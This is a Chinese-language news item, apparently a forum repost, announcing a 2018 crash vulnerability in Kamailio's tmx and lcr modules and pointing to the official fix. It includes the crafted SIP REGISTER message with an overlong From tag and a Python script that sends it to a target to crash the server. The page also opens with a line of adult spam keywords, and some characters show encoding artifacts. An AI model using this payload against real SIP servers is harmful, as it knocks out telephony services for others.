欧美,精品,综合,亚洲,好吊妞视频免新费观看,免费观看三级吃奶,一级a片女人自慰免费看

您當(dāng)前的位置是:  首頁 > 新聞 > 國內(nèi) >
 首頁 > 新聞 > 國內(nèi) >

爆kamailio 安全問題影響tmx和lcr module模塊

2018-03-21 11:08:59   作者:james.zhu   來源:Asterisk開源派   評論:0  點(diǎn)擊:


  kamailio 版本4.4.5.0 和5.1模塊爆安全問題,tmx模塊和lcr模塊可能收到影響。攻擊者可根據(jù)模塊漏洞通過tag 方式使用非法的branch或from tag對kamailio進(jìn)行攻擊,可導(dǎo)致kamalio崩潰。tmx 模塊負(fù)責(zé)對transaction management 進(jìn)行管理,LCR則負(fù)責(zé)是一個最低資費(fèi)路由模塊。如果用戶沒有使用以上兩個模塊,則無影響,如果使用了以上兩個模塊,官方建議盡快升級到最新版本。
  以下是通過SIP tag 攻擊kamailio導(dǎo)致軟交換崩潰的消息:
  • REGISTER sip:localhost:5060 SIP/2.0
  • Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394
  • To: <sip:1@localhost:5060>
  • From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg
  • Call-ID: 8b113457-c6a6-456a-be68-606686d93c38
  • Contact: sip:1@127.0.0.1:53497
  • Max-Forwards: 70
  • CSeq: 10086 REGISTER
  • User-Agent: go SIP fuzzer/1
  • Content-Length: 0
  使用的Python 代碼攻擊方式如下,
  python crash.py <ip> <port>
  #!/usr/bin/env python
  import socket
  import sys
  PROTO = "udp"
  SERVER_IP = "127.0.0.1"
  SERVER_PORT = 5060
  for _ in range(2):
  • sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  • sock.connect((sys.argv[1], int(sys.argv[2])))
  • msg = "REGISTER sip:localhost:5060 SIP/2.0\r\n" \
  • "Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394\r\n" \
  • "To: <sip:1@localhost:5060>\r\n" \
  • "From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg\r\n" \
  • "Call-ID: 8b113457-c6a6-456a-be68-606686d93c38\r\n" \
  • "Contact: sip:1@127.0.0.1:53497\r\n" \
  • "Max-Forwards: 70\r\n" \
  • "CSeq: 10086 REGISTER\r\n" \
  • "User-Agent: go SIP fuzzer/1\r\n" \
  • "Content-Length: 0\r\n" \
  • "\r\n"
  sock.sendall(msg)
  具體補(bǔ)防漏洞的方式主要通過對 R-URI的字符串長度進(jìn)行檢查。
  請查看官方網(wǎng)站的cfg配置:
  https://www.kamailio.org/w/2018/03/kamailio-security-announcement-tmx-lcr/
  關(guān)注微信公眾號:asterisk-cn,獲得有價值的行業(yè)分享
  開源IPPBX論壇:www.ippbx.org.cn
  Asterisk, freepbx技術(shù)文檔: www.freepbx.org.cn
  融合通信商業(yè)解決方案首選產(chǎn)品:www.hiastar.com
【免責(zé)聲明】本文僅代表作者本人觀點(diǎn),與CTI論壇無關(guān)。CTI論壇對文中陳述、觀點(diǎn)判斷保持中立,不對所包含內(nèi)容的準(zhǔn)確性、可靠性或完整性提供任何明示或暗示的保證。請讀者僅作參考,并請自行承擔(dān)全部責(zé)任。

專題